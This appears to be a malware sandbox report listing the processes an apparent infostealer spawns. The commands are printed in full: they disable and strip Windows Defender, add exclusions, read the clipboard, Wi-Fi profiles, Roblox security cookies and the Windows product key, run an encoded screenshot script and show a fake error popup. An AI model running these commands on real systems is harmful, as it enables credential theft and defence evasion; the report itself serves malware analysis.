Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag